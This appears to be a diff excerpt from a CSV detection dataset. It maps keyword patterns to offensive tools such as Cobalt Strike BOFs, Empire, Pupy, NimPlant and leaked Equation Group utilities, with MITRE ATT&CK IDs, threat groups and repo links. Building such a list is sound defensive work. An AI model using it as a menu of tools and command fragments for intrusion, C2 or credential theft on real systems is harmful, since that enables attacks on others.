+"*SELECT displayName FROM AntiVirusProduct*","offensive_tool_keyword","primusC2","another C2 framework","T1090 - T1071","TA0011 - TA0002","N/A","N/A","C2","https://github.com/Primusinterp/PrimusC2","1","0","N/A","10","10","42","4","2023-08-21T04:05:48Z","2023-04-19T10:59:30Z"
+"*SELECT SYSTEM_USER as 'Logged in as'* CURRENT_USER as 'Mapped as'*","offensive_tool_keyword","CheeseTools","tools for Lateral Movement/Code Execution","T1021.006 - T1059.003 - T1105","TA0008 - TA0002","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/klezVirus/CheeseTools","1","0","N/A","10","7","653","138","2021-08-17T20:22:56Z","2020-08-24T01:28:12Z"
+"*self_delete.x64.o*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - 
APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z"
+"*Self_Deletion_BOF*","offensive_tool_keyword","cobaltstrike","BOF implementation of the research by @jonasLyk and the drafted PoC from @LloydLabs","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EspressoCake/Self_Deletion_BOF","1","1","N/A","10","10","159","22","2021-10-03T19:10:21Z","2021-10-03T19:01:14Z"
+"*-selfdelete.exe -d:selfdelete*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","0","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*SeManageVolumeExploit.*","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - 
TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z"
+"*SeManageVolumeExploit-main","offensive_tool_keyword","SeManageVolumeExploit","This exploit grants full permission on C:\ drive for all users on the machine","T1046 - T1098 - T1222.002","TA0007 - TA0005 - TA0040","N/A","N/A","Privilege Escalation","https://github.com/CsEnox/SeManageVolumeExploit","1","1","N/A","10","1","44","13","2023-05-29T05:41:16Z","2021-10-11T01:17:04Z"
+"*Semperis/GoldenGMSA*","offensive_tool_keyword","GoldenGMSA","GolenGMSA tool for working with GMSA passwords","T1003.004 - T1078.003 - T1059.006","TA0006 - TA0004 - TA0002","N/A","N/A","Credential Access","https://github.com/Semperis/GoldenGMSA","1","1","N/A","7","2","113","17","2023-07-03T09:35:48Z","2022-02-03T10:32:05Z"
+"*send \*\[ \\*\$BASH\\* = \\*/bin/bash\\* -o \\*\$SHELL\\* = \\*/bin/bash\\* \]*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- from files ftshell File transfer shell","T1055 - T1036 - T1038 - T1203 - T1059","TA0002 - TA0003 - TA0008","N/A","N/A","Data Exfiltration","https://github.com/Artogn/EQGRP-1/blob/master/Linux/bin/ftshell.v3.10.2.1","1","0","N/A","N/A","1","0","1","2017-04-10T05:02:35Z","2017-04-10T06:59:29Z"
+"*Send the payload with the grooms*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","Exploit-EternalBlue.ps1","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z"
+"*send_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","Collection of Beacon Object Files (BOFs) for shells and lols","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/BOFs","1","1","N/A","10","10","104","12","2021-09-14T09:03:58Z","2021-08-27T10:04:12Z"
+"*send_shellcode_via_pipe*","offensive_tool_keyword","cobaltstrike","LiquidSnake is a tool that allows operators to perform fileless 
lateral movement using WMI Event Subscriptions and GadgetToJScript","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/RiccardoAncarani/LiquidSnake","1","1","N/A","10","10","306","47","2021-09-01T11:53:30Z","2021-08-31T12:23:01Z"
+"*Send-CalendarNTLMLeak *","offensive_tool_keyword","POC","CVE-2023-23397 POC Powershell exploit","T1068 - T1557.001 - T1187 - T1212 -T1003.001 - T1550","TA0003 - TA0002 - TA0004","N/A","N/A","Exploitation tools","https://github.com/api0cradle/CVE-2023-23397-POC-Powershell","1","0","N/A","N/A","4","340","64","2023-03-17T07:47:40Z","2023-03-16T19:43:39Z"
+"*sendmail -osendmail chmod +x sendmail*","offensive_tool_keyword","EQGRP tools","Equation Group hack tool leaked by ShadowBrokers- file emptybowl.py RCE for MailCenter Gateway (mcgate) - an application that comes with Asia Info Message Center mailserver buffer overflow allows a string passed to popen() call to be controlled by an attacker arbitraty cmd execute known to work only for AIMC Version 2.9.5.1","T1053 - T1064 - T1059 - T1218","TA0002 - 
TA0007","N/A","N/A","Web Attacks","https://github.com/x0rz/EQGRP/blob/master/Linux/bin/emptybowl.py","1","0","N/A","N/A","10","4011","2166","2017-05-24T21:12:59Z","2017-04-08T14:03:59Z"
+"*sense2john.py*","offensive_tool_keyword","john","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","N/A","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","10","8297","1937","2023-10-03T13:59:15Z","2011-12-16T19:43:47Z"
+"*sensepost/goDoH*","offensive_tool_keyword","godoh","godoh is a proof of concept Command and Control framework. written in Golang. that uses DNS-over-HTTPS as a transport medium. Currently supported providers include Google. Cloudflare but also contains the ability to use traditional DNS.","T1071 - T1001 - T1008 - T1070 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/sensepost/godoh","1","1","N/A","10","10","701","122","2023-02-25T06:31:07Z","2018-10-23T07:24:04Z"
+"*sensepost/reGeorg*","offensive_tool_keyword","reGeorg","The successor to reDuh - pwn a bastion webserver and create SOCKS proxies through the DMZ. 
Pivot and pwn.","T1090 - T1095 - T1572","TA0002 - TA0007 - ","N/A","N/A","Data Exfiltration","https://github.com/sensepost/reGeorg","1","1","N/A","N/A","10","2828","844","2020-11-04T10:36:24Z","2014-08-08T00:58:12Z"
+"*sensepost/ruler*","offensive_tool_keyword","ruler","A tool to abuse Exchange services","T1102.001 - T1201.001 - T1570.002","TA0006","N/A","N/A","Exploitation tools","https://github.com/sensepost/ruler","1","1","N/A","N/A","10","1994","353","2021-02-19T09:28:07Z","2016-08-18T15:05:13Z"
+"*sensepost/wiresocks*","offensive_tool_keyword","wiresocks","Docker-compose and Dockerfile to setup a wireguard VPN connection forcing specific TCP traffic through a socks proxy.","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","Defense Evasion","https://github.com/sensepost/wiresocks","1","1","N/A","9","3","250","24","2022-09-29T07:41:16Z","2022-03-23T12:27:07Z"
+"*sensitive_files_win.txt*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. 
security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z"
+"*Sensitivelocalfiles.txt*","offensive_tool_keyword","WinPwn","Automation for internal Windows Penetrationtest AD-Security","T1003 - T1087 - T1069 - T1047 - T1547.001 - T1035","TA0006 - TA0007 - TA0002 - TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/S3cur3Th1sSh1t/WinPwn","1","1","N/A","N/A","10","2961","495","2023-07-13T14:09:33Z","2018-03-07T12:51:25Z"
+"*senzee1984/micr0_shell*","offensive_tool_keyword","micr0_shell","micr0shell is a Python script that dynamically generates Windows X64 PIC Null-Free reverse shell shellcode.","T1059.003 - T1027.001","TA0002 - TA0005","N/A","N/A","Exploitation tools","https://github.com/senzee1984/micr0_shell","1","1","N/A","9","1","91","12","2023-09-16T02:35:28Z","2023-08-13T02:46:51Z"
+"*seriously_nothing_shady_here*","offensive_tool_keyword","koadic","Koadic. or COM Command & Control. is a Windows post-exploitation rootkit similar to other penetration testing tools such as Meterpreter and Powershell Empire. The major difference is that Koadic does most of its operations using Windows Script Host (a.k.a. JScript/VBScript). 
with compatibility in the core to support a default installation of Windows 2000 with no service packs (and potentially even versions of NT4) all the way through Windows 10.","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1112 - T1204 - T1205 - T1218","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","199","62","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z"
+"*serve_ps1_payload*","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","7843","1826","2023-08-28T13:08:08Z","2015-09-21T17:30:53Z"
+"*Server enforces NLA; switching to 'fake server' mode*","offensive_tool_keyword","Seth","Perform a MitM attack and extract clear text credentials from RDP connections","T1557 - T1557.001 - T1110 - T1110.001 - T1071 - T1071.001","TA0006 ","N/A","N/A","Sniffing & Spoofing","https://github.com/SySS-Research/Seth","1","0","N/A","9","10","1299","343","2023-02-09T14:29:05Z","2017-03-10T15:46:38Z"
+"*server*-relay.screenconnect.com*","greyware_tool_keyword","ScreenConnect","control remote servers - abused by threat actors","T1021.001 - T1078 - T1133 - T1112","TA0008 - TA0003 - TA0004 - TA0005 - TA0011 - TA0010","N/A","N/A","RMM","screenconnect.com","1","1","N/A","10","10","N/A","N/A","N/A","N/A"
+"*server.py generate --address * --port * --output * 
--source*","offensive_tool_keyword","SillyRAT","A Cross Platform multifunctional (Windows/Linux/Mac) RAT.","T1055.003 - T1027 - T1105 - T1005","TA0002 - TA0003 - TA0008 - TA0011","N/A","N/A","POST Exploitation tools","https://github.com/hash3liZer/SillyRAT","1","0","N/A","N/A","6","594","151","2023-06-23T18:49:43Z","2020-05-10T17:37:37Z"
+"*server/modules/csharp/*","offensive_tool_keyword","empire","Empire is a post-exploitation and adversary emulation framework that is used to aid Red Teams and Penetration Testers.","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1157","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/BC-SECURITY/Empire","1","1","N/A","N/A","10","3589","533","2023-09-08T05:50:59Z","2019-08-01T04:22:31Z"
+"*server@egress-asses.com*","offensive_tool_keyword","Egress-Assess","Egress-Assess is a tool used to test egress data detection capabilities","T1561 - T1041 - T1558 - T1071 - T1074","TA0010 - TA0011 - TA0008","N/A","Darkhotel - DUBNIUM - Putter Panda","Exploitation tools","https://github.com/FortyNorthSecurity/Egress-Assess","1","1","can 
be used for data exfiltration simulation","8","6","546","141","2023-08-09T18:40:57Z","2014-12-10T13:39:11Z"
+"*server=*port=53531*","offensive_tool_keyword","dnscat2","This tool is designed to create an encrypted command-and-control (C&C) channel over the DNS protocol","T1071.004 - T1102 - T1071.001","TA0002 - TA0003 - TA0008","N/A","N/A","C2","https://github.com/iagox86/dnscat2","1","0","N/A","10","10","3077","596","2023-04-26T17:40:22Z","2013-01-04T23:15:55Z"
+"*-server=http://127.0.0.1:4002*","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","N/A","C2","https://github.com/jpillora/chisel","1","0","N/A","10","10","9896","1161","2023-10-01T20:54:43Z","2015-02-25T11:42:50Z"
+"*server-7566091c4e4a2a24.js*","offensive_tool_keyword","nimplant","A light-weight first-stage C2 implant written in Nim","T1059-001 - T1027 - T1036","TA0002 - TA0005 - TA0002","N/A","N/A","C2","https://github.com/chvancooten/NimPlant","1","1","N/A","10","10","643","86","2023-08-31T14:52:00Z","2023-02-13T13:42:39Z"
+"*server-console.exe +*","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
+"*server-console.py --mifi-ip *","offensive_tool_keyword","SMShell","PoC for a SMS-based shell. 
Send commands and receive responses over SMS from mobile broadband capable computers","T1021.001 - T1059.006 - T1071.004 - T1069.003","TA0002 - TA0011 - TA0009 - TA0040","N/A","N/A","C2","https://github.com/persistent-security/SMShell","1","0","N/A","10","10","272","20","2023-05-22T10:40:16Z","2023-05-22T08:26:44Z"
+"*--server-port * --server-ip * --proxy-ip * --proxy-port *","offensive_tool_keyword","rpivot","socks4 reverse proxy for penetration testing","T1090.004 - T1572 - T1021.001","TA0011 - TA0002 - TA0040","N/A","N/A","C2","https://github.com/klsecservices/rpivot","1","0","N/A","10","10","490","125","2018-07-12T09:53:13Z","2016-09-07T17:25:57Z"
+"*serverscan.linux.elf*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z" 
+"*serverscan.linux.so*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*serverScan.win.cna*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - 
T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*serverscan_386.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
+"*ServerScan_Air_*.exe*","offensive_tool_keyword","cobaltstrike","ServerScan is a high-concurrency network scanning and service detection tool developed in Golang.","T1548.002 
- T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Adminisme/ServerScan","1","1","N/A","10","10","1430","218","2022-06-28T08:27:39Z","2020-04-03T15:14:12Z"
